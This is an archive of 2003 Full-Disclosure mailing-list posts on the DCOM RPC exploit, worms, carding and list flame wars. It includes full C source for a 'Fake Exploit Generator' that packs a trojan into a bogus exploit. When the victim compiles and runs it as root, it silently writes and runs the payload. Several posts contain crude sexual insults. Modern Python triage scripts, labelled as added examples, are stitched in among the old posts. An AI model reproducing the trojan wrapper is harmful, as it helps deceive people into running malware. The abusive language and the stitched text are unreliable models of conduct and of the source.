What if it just kept an internal list of return addresses and simply cycled through them each in a separate thread until it was able to gain access to the machine? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Robert Wesley McGrew Sent: Monday, July 28, 2003 1:11 PM To: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c) On Mon, 28 Jul 2003, Schmehl, Paul L wrote: 2) For this DCOM RPC problem in particular, everyone's talking about worms. How would the worm know what return address to use? Remote OS fingerprinting would mean it would be relatively large, slow, and unreliable (compared with Slammer), and sticking with one would cause more machines to just crash than to spread the worm. I haven't looked into this very closely yet to see if it can be generalized. What fingerprinting? If you've got 135/UDP open to the Internet, you're screwed. Slammer didn't fingerprint. It simply hit every box it could find on port 1434/UDP, and the exploit either worked or it didn't. Most worms do the same. They attack indiscriminately, and infect those OSes that are susceptible. And with Windows, that's enough boxes to cause a real problem. Thanks for responding. I realize that having 135 open on any Windows machine makes you vulnerable, and that you wouldn't need to differentiate Windows/OtherOSes. My question is about different Windows versions. The version (NT/2000/XP), service pack, and language at least have to be known to get the return address right. If it's guessed wrong, the system goes down with no shell executed. Any worm using this would need to know the return address before attempting to exploit. If a worm were to stick to targeting one return address (say, English XP SP1), every time it ran across something slightly different (SP0, german, win2k, etc) it would simply crash it and not spread. 
One of three things would happen in the case of this worm : 1) Sticks with one return address, makes a spectacular DoS against all other languages/versions/SPs. This could limit how quickly it spreads. 2) Somehow finds out ahead of time what the remote language/version/SP is. Could be very unreliable and slow. 3) There is some way of generalizing the return address in a way that would work on at least a large portion of installs. This is what would bring it into the league of Very Scary Worms. Has anyone seen any indication in the private exploits or in their research that there's a way to get it to work reliably on systems without having to know version/SP/etc? ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] DCOM RPC exploit (dcom.c)
This exploit works exceptionally well. Frighteningly well. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of christopher neitzert Sent: Saturday, July 26, 2003 3:38 PM To: Justin Shin Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] DCOM RPC exploit (dcom.c) I've managed to compile it under gcc 3.2.2 without error, yet it doesn't seem to do anything but hang itself against XP-Professional hosts, as I haven't a 2k box available to test against. chris On Sat, 2003-07-26 at 17:25, Justin Shin wrote: 03-026 working exploit Anyone had any luck compiling any of these exploits? I continue to receive compiler warnings whether I use gcc or a dgc. -- Justin Shin ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Christopher Neitzert http://www.neitzert.com/~chris chrisATneitzert{dot}com - GPG Key ID: 7DCC491B
[Full-Disclosure] RE:
I was never under the impression that this was more than a social experiment setup for Len's amusement. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Anthony Aykut Sent: Friday, July 18, 2003 5:16 PM To: Donnie Weiner Cc: [EMAIL PROTECTED] Subject: How come this list filters/stops/bans profanity, but fails to squeeze out puss like you?? Just goes to show what a fucking joke this list is, doesn't it?? - Original Message - LOL From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] Subject: RE: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:49:07 - I am guessing yuo can't even suck my dad's dick you fucking limp retard cunt. If you think you can treat everybody like your favourite bitch you arrogant fuck, you did hit send on your mail to the wrong person. You l33t? Don't make me laugh, ass-boy. The only person tripping is, you. I cream my pants every fucking day reading this list, which is turned now into a retard circus due to lame-ass, would be funny, know-it-all mother fuckers like you. Donnie Wiener, the stupid kiddie-fucker won't even reveal his real name. Shame on you - cannot even converse without making personal attacks. Do I take it too personal? Fuck yeah. The moment you put my name on this mail, you crossed the line you cunt. I probably get banned from this list now for writing this email, but who gives a flying fuck - this list is ruined anyways. By fucks like you. Bye FD. By Weiner, the ass-rammed, gay-boy. Go and run back to your mommy, she'll suck your dick any day. - Original Message - i ll change yar mom panties bettar :D is yuo who say to excuse morning_wood i must demand yuo for have such bad guilt trip From: Anthony Aykut [EMAIL PROTECTED] To: Donnie Weiner [EMAIL PROTECTED] CC: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] TO: Anthony Aykut Date: 18 Jul 2003 19:33:18 - Yawn, change the record. - Original Message - shutup yar dum. Christ almighty. 
For all your bickering, wit and inventiveness, if you people put the same energy and will into educating people or arguing in a civil manner over what you are not agreeing to, this list would be a much better place. Wood at least tries, even though some of you may or may not agree to what or how he is doing it. But no, of course you won't do that, you'll have to show off and be arrogant - because let's face it we just love one-upmanship and love to mock people. That way we can REALLY show them that we are better. Sad. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE:
I can't help it. I'm going to have to comment to a comment about my own comments about commenting about the list, seriously it just HAS to be done. Who has a comment? Any takers? Thanks, The Professional -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremiah Cornelius Sent: Friday, July 18, 2003 6:25 PM Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: I was never under the impression that this was more than a social experiment setup for Len's amusement. Christ! Out of another lame, flame-thread, comes the most accurate and insightful comment about the list! Pity that meta-threads are more common here than actual contents. Hey look, I'm commenting about commenting about the list! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] RE:
Anyone interested in a list called indecent-disclosure? -Original Message- From: micah mcnelly [mailto:[EMAIL PROTECTED] Sent: Friday, July 18, 2003 7:31 PM To: gml; 'Jeremiah Cornelius' Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: Len Rose is a muppet. /m - Original Message - From: gml [EMAIL PROTECTED] To: 'Jeremiah Cornelius' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, July 18, 2003 4:29 PM Subject: RE: [Full-Disclosure] RE: I can't help it. I'm going to have to comment to a comment about my own comments about commenting about the list, seriously it just HAS to be done. Who has a comment? Any takers? Thanks, The Professional -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jeremiah Cornelius Sent: Friday, July 18, 2003 6:25 PM Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] RE: I was never under the impression that this was more than a social experiment setup for Len's amusement. Christ! Out of another lame, flame-thread, comes the most accurate and insightful comment about the list! Pity that meta-threads are more common here than actual contents. Hey look, I'm commenting about commenting about the list! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Credit card numbers
Also I'm really not entirely sure what's so professional about this list. What deems a professional anyway? I mean seriously, you stopped hacking and got a job instead so now you're a professional? You avoided prison until the age of 18 and someone was foolish enough to pay you for your intellectual property so now you are a professional? Or maybe you have a CISSP and you know absolutely everything and that makes you a professional. Come on please. Nothing is even remotely as black and white as it's made out to be. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of gml Sent: Thursday, July 17, 2003 6:18 PM To: 'northern snowfall'; 'Nick Jacobsen' Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Credit card numbers Carding is for hackers who enjoy prison. If you are considering illegal activity that involves theft or the possible involvement of the secret service, I suggest you first ask yourself whether or not you enjoyed high school cafeteria food and then imagine eating that for the next 20-30 years. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 6:59 PM To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers This is a professional list - would you go up to someone at a computer security conference and tell em oh yeah, I used to card during highschool all the time? Oh grow up Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Invaded by morons..
Does Mac OS X count? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 8:25 PM To: Dortmunder Lethman Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Invaded by morons.. I won't respond to anyone who didn't use unix to send mail to me. Um, is amoeba or plan9 ok? :P Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Credit card numbers
My point was that at a certain point regardless you realize, hopefully as you grow up, that carding is REALLY INCREDIBLY STUPID and often results in a serious prison sentence. -Original Message- From: micah mcnelly [mailto:[EMAIL PROTECTED] Sent: Thursday, July 17, 2003 6:47 PM To: gml; 'northern snowfall'; 'Nick Jacobsen' Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers i used to card during high school all the time. /m - Original Message - From: gml [EMAIL PROTECTED] To: 'northern snowfall' [EMAIL PROTECTED]; 'Nick Jacobsen' [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Thursday, July 17, 2003 3:18 PM Subject: RE: [Full-Disclosure] Credit card numbers Carding is for hackers who enjoy prison. If you are considering illegal activity that involves theft or the possible involvement of the secret service, I suggest you first ask yourself whether or not you enjoyed high school cafeteria food and then imagine eating that for the next 20-30 years. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of northern snowfall Sent: Thursday, July 17, 2003 6:59 PM To: Nick Jacobsen Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Credit card numbers This is a professional list - would you go up to someone at a computer security conference and tell em oh yeah, I used to card during highschool all the time? Oh grow up Don http://www.7f.no-ip.com/~north_ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] A worm...
Excuse me if I don't get excited over another mass mailing worm. :( -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of ATD Sent: Wednesday, June 25, 2003 6:53 PM To: [EMAIL PROTECTED] Subject: [Full-Disclosure] A worm... .pif being .zip, is this new? cute virus/worm. I know what it is, but since when did the pif worm start zipping itself? did I miss something? [darf] ~/virus unzip your_details.zip Archive: your_details.zip inflating: details.pif [darf] ~/virus ls details.pif your_details.zip [darf] ~/virus ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
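The point of the zipped .pif in the post above is that a gateway which only looks at the outer attachment extension sees a harmless .zip. Below is an added example, not code from the post or its author, of a triage routine that looks inside the archive before deciding: executable extensions (.pif included), document-looking double extensions, an MZ header on the first bytes, and an absurd compression ratio. The archive and the MZ stub it contains are constructed here for the example; they are not the worm from the post.

```python
import io
import zipfile

# Extensions Windows executes on double-click; .pif is the one the post's attachment used
EXECUTABLE_EXTS = {"pif", "exe", "scr", "com", "bat", "cmd", "vbs", "js"}
# Extensions a user expects to be harmless, used for the double-extension check
DOCUMENT_EXTS = {"txt", "doc", "pdf", "jpg", "gif", "htm", "html"}


def build_sample_zip(members):
    """Constructed sample archive: {name: bytes} written in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def triage_archive(blob, max_ratio=200):
    """Return [(member name, [reasons])] for members a mail gateway should block.
    Inspects the members instead of trusting the outer .zip extension."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = []
            base = info.filename.rsplit("/", 1)[-1].lower()
            parts = base.split(".")
            if len(parts) > 1 and parts[-1] in EXECUTABLE_EXTS:
                reasons.append("executable extension ." + parts[-1])
            if len(parts) > 2 and parts[-2] in DOCUMENT_EXTS:
                reasons.append("double extension")
            with zf.open(info) as fh:
                head = fh.read(2)
            if head == b"MZ":
                reasons.append("PE/MZ header")
            if info.compress_size and info.file_size / info.compress_size > max_ratio:
                reasons.append("suspicious compression ratio")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


# Constructed stand-in for your_details.zip: a .pif with an MZ stub next to a text file
SAMPLE_ZIP = build_sample_zip({
    "details.pif": b"MZ\x90\x00" + b"dummy stub, not a real PE\n" * 4,
    "readme.txt": b"just text\n",
})

if __name__ == "__main__":
    for name, reasons in triage_archive(SAMPLE_ZIP):
        print(name, "->", ", ".join(reasons))
```

The MZ check matters because a .pif whose content is a PE image is run as one by Windows regardless of the extension, and because renaming the member to .dat would defeat the extension check alone.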
RE: [Full-Disclosure] Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST)
What does that do? -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Eric Chien Sent: Friday, June 20, 2003 1:19 PM To: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Apache 1.3.27 Remote Root 0-Day Exploit (OFFICIAL POST) At 08:39 AM 6/20/2003 -0700, you wrote: I am posting this as a member of koec. The koec take no responsibility for damages caused by this software, compile and use at your own risk. By the way, the koec make you all look like a bunch of fuckin' schoolgirls. [cut] void(*b)()=(void*)shellcode;b(); Clearly, the kids are out of school. ...Eric ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Re: -1 day exploit - Warning
On Friday 13 June 2003 06:51 pm, David Bernick wrote: Well anyway, I got inspired:

// Fake Exploit Generator
// [EMAIL PROTECTED]
//
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>

/* true if c is not in the base64 alphabet; on success p points at c inside b64string */
#define badchar(c,p) (!(p = memchr(b64string, c, 64)))

char b64string[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* base64: the comment and #include preamble written at the top of the generated file */
static char header[] =
"Ly8gZ2VuZXJhdGVkIHdpdGggRmFrZSBFeHBsb2l0IEdlbmVyYXRvciA6OiBnbWxAcGhyaWNr"
"Lm5ldAoKI2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1"
"ZGUgPHN5cy9zdGF0Lmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4K";

/* base64: usage(), setup() and main() of the generated "exploit". usage() insists on
   root and a <target> argument; setup() XORs shellcode[] with MAX back into the
   original file, writes it to a tmpnam() path, chmods it 0755, runs it with
   system() and unlinks it */
static char body[] =
"dm9pZCB1c2FnZShpbnQgYXJncywgY2hhciAqc2VsZikKewoJaWYoZ2V0dWlkKCkgIT0gMCkK"
"CXsKCQlwcmludGYoIlRoaXMgcHJvZ3JhbSByZXF1aXJlcyBwcml2aWxlZGdlcyB5b3UgZG8g"
"bm90IHBvc2Vzcy5cbiIpOwoJCWV4aXQoMCk7Cgl9CgllbHNlCgl7CgoJCWlmKGFyZ3MgPCAy"
"KQoJCXsKCQkJcHJpbnRmKCJ1c2FnZTogJXMgPHRhcmdldD5cbiIsIHNlbGYpOwoJCQlleGl0"
"KDApOwoJCX0KCX0KCn0KCnZvaWQgc2V0dXAoKQp7CgljaGFyICp0bXA7CglGSUxFICpmcDsK"
"CWNoYXIgYnl0ZVswXTsKCWludCBpOwoKCXRtcCA9IHRtcG5hbShOVUxMKTsKCWZwID0gZm9w"
"ZW4odG1wLCAidyIpOwoJaWYoZnApCgl7CgkJZm9yKGkgPSAwOyBpIDwgc2l6ZW9mKHNoZWxs"
"Y29kZSk7IGkrKykKCQl7CgkJCWJ5dGVbMF0gPSBzaGVsbGNvZGVbaV0gXiBNQVg7CgkJCWZ3"
"cml0ZShieXRlLCAxLCAxLCBmcCk7CgkJfQoJCWZjbG9zZShmcCk7CgkJY2htb2QodG1wLCAw"
"NzU1KTsKCQlzeXN0ZW0odG1wKTsKCQl1bmxpbmsodG1wKTsKCX0KfQoKaW50Cm1haW4gKGlu"
"dCBhcmdjLCBjaGFyICphcmd2W10pCnsKCXVzYWdlKGFyZ2MsIGFyZ3ZbMF0pOwoJc2V0dXAo"
"KTsKCS8vIGRvIHNvbWUgc2hpdCBoZXJlCn0K";

/* decode len base64 characters from "from" into "to" (NUL-terminated);
   returns the decoded length, or -1 on a bad character or a length not
   divisible by four */
long b64dec(char *to, char *from, unsigned int len)
{
    char *fromp = from;
    char *top = to;
    char *p;
    unsigned char cbyte;
    unsigned char obyte;
    int padding = 0;

    for (; len >= 4; len -= 4) {
        /* character 1: top six bits of output byte 1 */
        if ((cbyte = *fromp++) == '=')
            cbyte = 0;
        else {
            if (badchar(cbyte, p))
                return -1;
            cbyte = (p - b64string);
        }
        obyte = cbyte << 2;

        /* character 2: low two bits of byte 1, top four bits of byte 2 */
        if ((cbyte = *fromp++) == '=')
            cbyte = 0;
        else {
            if (badchar(cbyte, p))
                return -1;
            cbyte = p - b64string;
        }
        obyte |= cbyte >> 4;
        *top++ = obyte;
        obyte = cbyte << 4;

        /* character 3: low four bits of byte 2, top two bits of byte 3 */
        if ((cbyte = *fromp++) == '=') {
            cbyte = 0;
            padding++;
        } else {
            padding = 0;
            if (badchar(cbyte, p))
                return -1;
            cbyte = p - b64string;
        }
        obyte |= cbyte >> 2;
        *top++ = obyte;
        obyte = cbyte << 6;

        /* character 4: low six bits of byte 3 */
        if ((cbyte = *fromp++) == '=') {
            cbyte = 0;
            padding++;
        } else {
            padding = 0;
            if (badchar(cbyte, p))
                return -1;
            cbyte = p - b64string;
        }
        obyte |= cbyte;
        *top++ = obyte;
    }
    *top = 0;
    if (len)
        return -1;
    return (top - to) - padding;
}

/* write one byte as a \xNN escape into the generated C source */
void printhex(unsigned char c, FILE *fp)
{
    fprintf(fp, "\\x%02x", c);
}

int main(int argc, char *argv[])
{
    FILE *trojan;
    FILE *fakeexp;
    unsigned char byte;
    int key;
    int count = 0;
    char *out;

    if (argc < 4) {
        printf("usage: %s <trojan> <fakeexp.c> <key>\n", argv[0]);
        printf("ex: %s trojan fakeexp.c 187\n", argv[0]);
        exit(0);
    }
    key = atoi(argv[3]) & 0xff;

    /* decoded text is always shorter than its base64, so sizeof(body) is enough */
    out = calloc(1, sizeof(body));
    if (!out)
        return 1;

    trojan = fopen(argv[1], "rb");
    fakeexp = fopen(argv[2], "w");
    if (trojan && fakeexp) {
        /* the preamble and the XOR key the generated program will use */
        if (b64dec(out, header, strlen(header)) < 0)
            return 1;
        fprintf(fakeexp, "%s", out);
        fprintf(fakeexp, "\n#define MAX\t%d\n\n", key);

        /* the "shellcode": every byte of the trojan XORed with the key, 16 per line */
        fprintf(fakeexp, "static char shellcode[] = {\n");
        while (fread(&byte, 1, 1, trojan) == 1) {
            if (count == 0)
                fprintf(fakeexp, "\"");
            printhex(byte ^ key, fakeexp);
            if (++count == 16) {
                fprintf(fakeexp, "\"\n");
                count = 0;
            }
        }
        if (count)
            fprintf(fakeexp, "\"\n");
        fprintf(fakeexp, "};\n\n");

        /* the rest of the fake exploit: usage(), setup(), main() */
        memset(out, 0, sizeof(body));
        if (b64dec(out, body, strlen(body)) < 0)
            return 1;
        fprintf(fakeexp, "%s", out);
        fclose(fakeexp);
        fclose(trojan);
    }
    free(out);
    return 0;
}
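Both posts above come down to the same warning: a "0-day" you compile and run can execute an embedded buffer on your own box, either directly (the `void(*b)()=(void*)shellcode;b();` line Eric Chien quoted casts the shellcode array to a function pointer and calls it) or indirectly, as the generator above does, by hiding the real program body in base64 and the payload behind a single-byte XOR. The following is an added example, not code from either post or their authors, of a small triage script to run over such a source before `gcc`: it flags the local function-pointer call and dangerous calls, decodes base64 string arrays, and recovers XOR-masked payloads by trying the keys found in `#define` lines and then all 256 single bytes. The sample source, key and payload it works on are constructed here in the same shape the generator emits; the payload is a harmless shell script standing in for the trojan.

```python
import base64
import binascii
import re

# Constructed sample inputs (not from the posts): the XOR key such a generator
# writes into "#define MAX", and harmless stand-ins for the hidden pieces.
XOR_KEY = 187
HIDDEN_PAYLOAD = b"#!/bin/sh\necho owned > /tmp/owned\n"
HIDDEN_BODY = b"system(tmp);\nunlink(tmp);\n"

DANGEROUS_CALLS = ("system", "tmpnam", "chmod", "unlink", "execve")
ESCAPE_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\s*\]\s*=\s*\{?\s*((?:"[^"\n]*"\s*)+)\}?\s*;')
DEFINE_RE = re.compile(r"#define\s+(\w+)\s+(\d+)")
# "(void*)buf; b();": a data buffer cast to a function pointer and called locally
LOCAL_EXEC_RE = re.compile(r"\(\s*void\s*\*\s*\)\s*(\w+)\s*;\s*\w+\s*\(\s*\)\s*;")


def render_c_array(name, data, key):
    """Emit `static char name[] = {...};` holding data XOR key as \\xNN escapes,
    16 bytes per line, the layout the generator above produces."""
    lines = []
    for i in range(0, len(data), 16):
        chunk = data[i:i + 16]
        lines.append('"' + "".join("\\x%02x" % (b ^ key) for b in chunk) + '"')
    return "static char %s[] = {\n%s\n};\n" % (name, "\n".join(lines))


def build_sample_source():
    """Constructed 'exploit' source: masked payload, base64-hidden body and the
    local function-pointer call from the Apache post, all in one file."""
    return (
        "#define MAX\t%d\n\n" % XOR_KEY
        + render_c_array("shellcode", HIDDEN_PAYLOAD, XOR_KEY)
        + 'static char body[] = {\n"%s"\n};\n' % base64.b64encode(HIDDEN_BODY).decode()
        + "void(*b)()=(void*)shellcode;b();\n"
    )


def literal_bytes(blob):
    """Concatenate adjacent C string literals, decoding \\xNN escapes to bytes."""
    out = bytearray()
    for lit in LITERAL_RE.findall(blob):
        pos = 0
        for m in ESCAPE_RE.finditer(lit):
            out += lit[pos:m.start()].encode("latin-1")
            out.append(int(m.group(1), 16))
            pos = m.end()
        out += lit[pos:].encode("latin-1")
    return bytes(out)


def try_base64(data):
    """Decode data as strict base64, or return None if it is not base64."""
    try:
        return base64.b64decode(data, validate=True)
    except (binascii.Error, ValueError):
        return None


def looks_executable(data):
    """Shebang script or ELF image: something the 'exploit' could run on you."""
    return data.startswith(b"#!") or data.startswith(b"\x7fELF")


def calls_in(text):
    """Names from DANGEROUS_CALLS that appear as calls in text (str or bytes)."""
    if isinstance(text, bytes):
        text = text.decode("latin-1")
    return [c for c in DANGEROUS_CALLS if re.search(r"\b%s\s*\(" % c, text)]


def analyze(src):
    """Triage a C 'exploit' before compiling it: flag local execution of an
    embedded buffer, decode base64-hidden source, recover XOR-masked payloads."""
    report = {"local_exec": LOCAL_EXEC_RE.findall(src), "calls": calls_in(src),
              "decoded": {}, "payloads": {}}
    keys = [v for v in (int(m.group(2)) for m in DEFINE_RE.finditer(src)) if 0 < v < 256]
    for m in ARRAY_RE.finditer(src):
        name, data = m.group(1), literal_bytes(m.group(2))
        decoded = try_base64(data)
        if decoded is not None:
            report["decoded"][name] = decoded
            report["calls"] += [c for c in calls_in(decoded) if c not in report["calls"]]
            continue
        # keys from #define lines first, then brute-force the single byte
        for key in keys + [k for k in range(256) if k not in keys]:
            plain = bytes(b ^ key for b in data)
            if looks_executable(plain):
                report["payloads"][name] = (key, plain)
                break
    return report


if __name__ == "__main__":
    for item, value in analyze(build_sample_source()).items():
        print(item, "->", value)
```

The brute force is cheap because the mask is one byte and the generator's own body tells you which define holds it; anything that decodes to a shebang or an ELF header is worth reading before you let the "exploit" anywhere near a root shell.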
Re: [Full-Disclosure] hackers are evil?
On Thursday 12 June 2003 12:49 pm, madsaxon wrote: for the record, i've been saying we need to change the nomenclature for awhile, suddenly everyone cares. i am truly amused. i'm going to go off now and be ahead of the curve some more. [Since nothing appears to be off topic for this list, I don't feel constrained to withhold my comments on that basis.] At 01:21 AM 6/13/03 +1000, Darren Reed wrote: The english language evolves and this is just part of it. Just as jelly in the USA is different to jelly in Australia, hacker post circa 1990 is different to hacker pre circa 1990. Oh, so Fosters is, in fact, Australian for beer? I guess I'm not ready to have the language I employ every day of my life dictated by the mass media. The evolution of language is conducted by consensus of the users, but in this case that consensus has been artificially promulgated not by a preponderance of the speakers, but by a very small minority who are supposed to be in the business of informing. If that doesn't bother you, fine. It does me. If hacker were the only instance of this phenomenon, I'd just write it off as an anomaly. It isn't, however. There are many examples, some obvious, some rather more subtle. We all have causes for which we're prepared to fight... m5x ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html